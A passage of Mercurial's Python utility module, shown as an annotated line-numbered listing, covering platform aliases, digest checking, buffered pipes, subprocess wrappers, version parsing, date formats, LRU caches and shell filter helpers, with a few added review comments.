122 normcasespec = platform.normcasespec
122 normcasespec = platform.normcasespec
123 normcasefallback = platform.normcasefallback
123 normcasefallback = platform.normcasefallback
124 openhardlinks = platform.openhardlinks
124 openhardlinks = platform.openhardlinks
125 oslink = platform.oslink
125 oslink = platform.oslink
126 parsepatchoutput = platform.parsepatchoutput
126 parsepatchoutput = platform.parsepatchoutput
127 pconvert = platform.pconvert
127 pconvert = platform.pconvert
128 poll = platform.poll
128 poll = platform.poll
129 popen = platform.popen
129 popen = platform.popen
130 posixfile = platform.posixfile
130 posixfile = platform.posixfile
131 quotecommand = platform.quotecommand
131 quotecommand = platform.quotecommand
132 readpipe = platform.readpipe
132 readpipe = platform.readpipe
133 rename = platform.rename
133 rename = platform.rename
134 removedirs = platform.removedirs
134 removedirs = platform.removedirs
135 samedevice = platform.samedevice
135 samedevice = platform.samedevice
136 samefile = platform.samefile
136 samefile = platform.samefile
137 samestat = platform.samestat
137 samestat = platform.samestat
138 setbinary = platform.setbinary
138 setbinary = platform.setbinary
139 setflags = platform.setflags
139 setflags = platform.setflags
140 setsignalhandler = platform.setsignalhandler
140 setsignalhandler = platform.setsignalhandler
141 shellquote = platform.shellquote
141 shellquote = platform.shellquote
142 spawndetached = platform.spawndetached
142 spawndetached = platform.spawndetached
143 split = platform.split
143 split = platform.split
144 sshargs = platform.sshargs
144 sshargs = platform.sshargs
145 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
145 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
146 statisexec = platform.statisexec
146 statisexec = platform.statisexec
147 statislink = platform.statislink
147 statislink = platform.statislink
148 testpid = platform.testpid
148 testpid = platform.testpid
149 umask = platform.umask
149 umask = platform.umask
150 unlink = platform.unlink
150 unlink = platform.unlink
151 username = platform.username
151 username = platform.username
152
152
153 try:
153 try:
154 recvfds = osutil.recvfds
154 recvfds = osutil.recvfds
155 except AttributeError:
155 except AttributeError:
156 pass
156 pass
157 try:
157 try:
158 setprocname = osutil.setprocname
158 setprocname = osutil.setprocname
159 except AttributeError:
159 except AttributeError:
160 pass
160 pass
161
161
162 # Python compatibility
162 # Python compatibility
163
163
164 _notset = object()
164 _notset = object()
165
165
166 # disable Python's problematic floating point timestamps (issue4836)
166 # disable Python's problematic floating point timestamps (issue4836)
167 # (Python hypocritically says you shouldn't change this behavior in
167 # (Python hypocritically says you shouldn't change this behavior in
168 # libraries, and sure enough Mercurial is not a library.)
168 # libraries, and sure enough Mercurial is not a library.)
169 os.stat_float_times(False)
169 os.stat_float_times(False)
170
170
171 def safehasattr(thing, attr):
171 def safehasattr(thing, attr):
172 return getattr(thing, attr, _notset) is not _notset
172 return getattr(thing, attr, _notset) is not _notset
173
173
174 def bitsfrom(container):
174 def bitsfrom(container):
175 bits = 0
175 bits = 0
176 for bit in container:
176 for bit in container:
177 bits |= bit
177 bits |= bit
178 return bits
178 return bits
179
179
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
# HGEMITWARNINGS is set by the test runner; any non-empty value enables
# the DeprecationWarning machinery below and in nouideprecwarn().
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
194
194
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    hint = ("\n(compatibility will be dropped after Mercurial-%s,"
            " update your code.)") % version
    # +1 so the warning points at our caller, not at this helper
    warnings.warn(msg + hint, DeprecationWarning, stacklevel + 1)
204
204
# Map of supported digest names to their hashlib constructors.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# sanity check: every advertised digest must have a constructor
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester(['md5', 'sha1'])
    >>> d.update('foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d['md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d['sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred(['md5', 'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        """Create one hasher per name in ``digests``; optionally feed ``s``.

        Raises Abort for an unknown digest name.
        """
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` to every underlying hasher."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest computed so far for ``key``.

        Raises Abort for an unknown digest name.
        """
        if key not in DIGESTS:
            # fix: this previously formatted the message with the undefined
            # name 'k' (a stale loop variable), so an unknown digest raised
            # NameError instead of the intended Abort
            raise Abort(_('unknown digest type: %s') % key)
        # NOTE(review): a key that is in DIGESTS but was not requested at
        # construction still raises KeyError here (pre-existing behavior).
        return self._hashes[key].hexdigest()

    def __iter__(self):
        # iterate over the digest names this instance was built with
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
262
262
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, feeding the digesters as we go."""
        data = self._fh.read(length)
        self._digester.update(data)
        self._got += len(data)
        return data

    def validate(self):
        """Abort unless the bytes read match the expected size and digests."""
        if self._size != self._got:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for name, wanted in self._digests.items():
            actual = self._digester[name]
            if wanted != actual:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (name, wanted, actual))
294
294
try:
    # Python 2: keep the builtin 'buffer'.
    buffer = buffer
except NameError:
    # Python 3 has no 'buffer' builtin; emulate it with memoryview slices.
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

# Close inherited file descriptors in child processes on POSIX (not safe
# to do on Windows, where handles are inherited differently).
closefds = pycompat.osname == 'posix'

# Bytes read per os.read() call by bufferedinputpipe._fillbuffer below.
_chunksize = 4096
306
306
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        # input: the underlying unbuffered pipe/file object
        self._input = input
        # pending byte chunks, oldest first
        self._buffer = []
        # set once os.read() returns '' (end of stream)
        self._eof = False
        # total number of buffered bytes (sum of chunk lengths)
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        # delegate to the wrapped pipe
        return self._input.closed

    def fileno(self):
        # expose the raw descriptor so select()/poll() can watch it
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # fill the buffer until we hold 'size' bytes or hit EOF
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the first newline within the last chunk, -1 if none
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        # keep reading until a newline shows up or the stream ends
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # collapse all pending chunks into one string
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        # re-seed the buffer with whatever was not consumed
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        # read straight from the fd, bypassing stdio buffering, so that
        # select()/poll() stays accurate (see class docstring)
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)
400
400
def popen2(cmd, env=None, newlines=False):
    """Run ``cmd`` through the shell; return its (stdin, stdout) pipes.

    stderr is left attached to the parent process.
    """
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd, shell=True, bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
411
411
def popen3(cmd, env=None, newlines=False):
    """Like popen4(), but drop the Popen object and return only the pipes."""
    stdin, stdout, stderr, _proc = popen4(cmd, env, newlines)
    return stdin, stdout, stderr
415
415
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Run ``cmd`` through the shell with all three stdio streams piped.

    Returns (stdin, stdout, stderr, Popen object).
    """
    proc = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
424
424
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # no generated version module (e.g. running from a plain checkout)
        return 'unknown'
    return __version__.version
432
432
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = '3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = '3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = '3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = '3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split "X.Y.Z<sep>extra" at the first '+' or '-'. Use a raw string:
    # the old '[\+-]' relied on the invalid escape sequence '\+' (deprecated
    # on modern Pythons), and '+' needs no escaping inside a character class.
    parts = remod.split(r'[+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # stop at the first non-numeric component (e.g. 'rc')
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
    # any other n falls through and returns None (pre-existing behavior)
501
501
# used by parsedate
# Candidate strptime() patterns, tried in order; presumably the first
# successful parse wins (verify in parsedate).
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M', # without seconds
    '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
    '%Y-%m-%dT%H%M', # without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M', # without seconds
    '%Y-%m-%d %H%M%S', # without :
    '%Y-%m-%d %H%M', # without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',
    # NOTE(review): the entry above duplicates '%Y-%m-%d %H:%M' listed
    # earlier; harmless if the first match wins, but could be dropped.
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)

# Coarser, more ambiguous formats accepted in addition to the defaults.
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
)
543
543
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # single-slot cache: compute once on first call, replay thereafter
        memo = []
        def f():
            if not memo:
                memo.append(func())
            return memo[0]
        return f
    results = {}
    if argcount == 1:
        # avoid packing/unpacking an args tuple in the common
        # single-argument case
        def f(arg):
            if arg not in results:
                results[arg] = func(arg)
            return results[arg]
    else:
        def f(*args):
            if args not in results:
                results[args] = func(*args)
            return results[args]

    return f
569
569
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([('a', 0), ('b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([('a', 2)])
    >>> d2.keys() # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Re-inserting an existing key removes it first, so the entry
        # moves to the end: "last-set" ordering.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for key, value in src:
                self[key] = value
594
594
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # user action is needed: commit what we have so far rather than
        # rolling back, then let the exception propagate to the caller
        tr.close()
        raise
    finally:
        # release() runs on every exit path (success, intervention, or
        # any other exception, which leaves the transaction un-closed)
        tr.release()
612
612
@contextlib.contextmanager
def nullcontextmanager():
    """A no-op context manager, usable where a context manager is required
    but nothing needs to happen on entry or exit."""
    yield
616
616
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # links are wired up by the owning lrucachedict
        self.next = self.prev = None
        # the _notset sentinel marks a node holding no entry
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
635
635
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        # backing dict: key -> _lrucachenode
        self._cache = {}

        # The ring starts as a single self-linked (empty) node; it grows
        # lazily via _addcapacity() up to 'max' nodes.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # a read promotes the entry to most-recently-used
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            # still growing: allocate a fresh node just before the head
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        # NB: unlike __getitem__, a get() hit does NOT promote the entry
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # empty every live node, stopping at the first already-empty one
        # (all live nodes are contiguous from the head)
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
794
794
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    results = {}
    order = collections.deque()
    # Single-argument functions are keyed by the bare argument; anything
    # else is keyed by the full positional-argument tuple.
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in results:
                # refresh recency: move the key to the back of the queue
                order.remove(arg)
            else:
                # evict the least-recently-used entry once we hold more
                # than 20 results
                if len(results) > 20:
                    del results[order.popleft()]
                results[arg] = func(arg)
            order.append(arg)
            return results[arg]
    else:
        def f(*args):
            if args in results:
                order.remove(args)
            else:
                if len(results) > 20:
                    del results[order.popleft()]
                results[args] = func(*args)
            order.append(args)
            return results[args]

    return f
821
821
class propertycache(object):
    """Descriptor computing a value on first access and caching it.

    The wrapped function runs once per instance; the result is written
    straight into the instance ``__dict__`` under the attribute's name,
    so subsequent lookups never reach the descriptor again.
    """

    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
834
834
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    # feed s on the child's stdin and collect everything it prints
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    out, err = proc.communicate(s)
    return out
841
841
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        # write the input data where the command can read it
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        # reserve the output file; the command itself fills it in
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        # on OpenVMS, bit 0 set in the status means success
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort removal of both temp files on every exit path
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
875
875
# map of filter-spec prefixes to filter implementations; specs with no
# recognized prefix fall back to pipefilter (see filter() below)
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
880
880
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # dispatch on a recognized prefix ('tempfile:', 'pipe:', ...)
    for prefix, filterfn in filtertable.iteritems():
        if cmd.startswith(prefix):
            return filterfn(s, cmd[len(prefix):].lstrip())
    # unprefixed specs are treated as plain shell pipe commands
    return pipefilter(s, cmd)
887
887
def binary(s):
    """return true if a string is binary data"""
    # empty input is treated as text; otherwise a NUL byte marks binary
    if not s:
        return False
    return '\0' in s
891
891
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # floor(log2(x)); defined as 0 for x == 0
        if not x:
            return 0
        bits = 0
        while x:
            x >>= 1
            bits += 1
        return bits - 1

    pending = []
    pendinglen = 0
    for piece in source:
        pending.append(piece)
        pendinglen += len(piece)
        if pendinglen < min:
            continue
        if min < max:
            # at least double the threshold, or jump to the largest
            # power of two not exceeding the chunk we are emitting
            min = min << 1
            nmin = 1 << log2(pendinglen)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        pendinglen = 0
    if pending:
        # flush whatever is left, even if below the threshold
        yield ''.join(pending)
922
922
# convenience alias so util callers need not import error directly
Abort = error.Abort
924
924
def always(fn):
    """Matcher predicate that accepts every input."""
    return True
927
927
def never(fn):
    """Matcher predicate that rejects every input."""
    return False
930
930
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7.
    """
    # nothing to work around on modern interpreters
    if sys.version_info >= (2, 7):
        return func

    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # only re-enable if the caller had it on to begin with
            if wasenabled:
                gc.enable()
    return wrapper
954
954
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        # on different drives (Windows) no relative path exists; fall
        # back to an absolute path anchored at root
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        # make n2 absolute too, so both sides compare component-wise
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # pop the common leading components shared by both paths
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # climb out of what remains of n1, then descend into n2
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
980
980
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    if safehasattr(sys, "frozen"): # new py2exe
        return True
    if safehasattr(sys, "importers"): # old py2exe
        return True
    return imp.is_frozen(u"__main__") # tools/freeze
990
990
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    # normal case: data files live next to this module
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)
999
999
# cached path of the 'hg' executable; resolved lazily by hgexecutable()
_hgexecutable = None
1001
1001
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            # explicit override via the HG environment variable
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                # frozen binaries: the interpreter *is* the hg executable
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # running from a source checkout's ./hg script
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # last resort: search $PATH, falling back to argv[0]
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1025
1025
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # updates the module-level cache consulted by hgexecutable()
    global _hgexecutable
    _hgexecutable = path
1030
1030
def _isstdout(f):
    # objects lacking a fileno() method can never be the real stdout
    filenofn = getattr(f, 'fileno', None)
    return filenofn and filenofn() == sys.__stdout__.fileno()
1034
1034
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # booleans and None become the conventional shell 0/1 strings
        if val is True:
            return '1'
        if val is None or val is False:
            return '0'
        return str(val)

    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    # expose the running hg binary to hooks and filters
    env['HG'] = hgexecutable()
    return env
1049
1049
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    # flush our buffered output first so it is not interleaved with the
    # child's output; best-effort only
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # output goes to our own stdout: let the child inherit it
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture combined stdout/stderr and copy it line-by-line to out
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    # on OpenVMS, bit 0 set in the status means success
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1076
1076
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # a traceback of depth one means the TypeError came from the
            # call itself (bad arguments), not from inside func
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) == 1:
                raise error.SignatureError
            raise

    return check
1088
1088
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1103
1103
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
